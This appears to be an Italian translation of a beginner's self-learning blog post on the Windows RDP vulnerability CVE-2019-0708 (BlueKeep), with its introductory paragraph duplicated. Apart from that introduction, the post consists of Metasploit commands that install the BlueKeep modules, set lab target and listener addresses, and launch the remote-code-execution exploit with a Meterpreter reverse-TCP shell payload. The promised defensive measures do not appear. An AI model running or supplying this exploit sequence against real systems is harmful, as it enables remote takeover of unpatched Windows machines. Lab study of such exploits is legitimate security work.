
Questo articolo condividerà la vulnerabilità del servizio desktop remoto di Windows (CVE-2019-0708) e spiegherà in dettaglio la vulnerabilità e le misure difensive. L'autore, essendo un principiante della sicurezza informatica, condivide alcuni tutorial di base per l'autoapprendimento, principalmente note online sugli strumenti di sicurezza e le operazioni pratiche. Spero che vi piacciano. Inoltre, spero che possiate operare e progredire insieme a me. In futuro, approfondirò la conoscenza della sicurezza informatica e della sicurezza di sistema e condividerò esperimenti correlati. In sintesi, spero che questa serie di articoli possa essere utile ai colleghi blogger. Scrivere articoli non è facile, i grandi esperti, per favore non criticate se non vi piacciono. Grazie!
Questo articolo condivide la vulnerabilità del servizio Desktop remoto di Windows (CVE-2019-0708) e spiega nel dettaglio la vulnerabilità e le misure difensive. L'autore, un principiante della sicurezza informatica, condivide alcuni tutorial di autoapprendimento di base, principalmente appunti online su strumenti di sicurezza e operazioni pratiche. Spero che vi piacciano. Inoltre, spero che possiate operare e progredire insieme a me. In futuro, approfondirò la conoscenza della sicurezza di rete e di sistema e condividerò esperimenti correlati. In sintesi, spero che questa serie di articoli possa essere utile ai lettori. Scrivere non è facile, esperti si astengano dal criticare, grazie!
Blog correlati:
[网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
Comandi principali:
# Copia file
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# Avvia strumento
msfconsole
reload_all
search 0708
# Usa script
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Mostra informazioni
show options
show targets
info
# Imposta indirizzo di ascolto, indirizzo target, payload di reverse shell, tipo target
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# Esegui script
run
exploit
# Imposta larghezza di banda
Set GROOMSIZE 40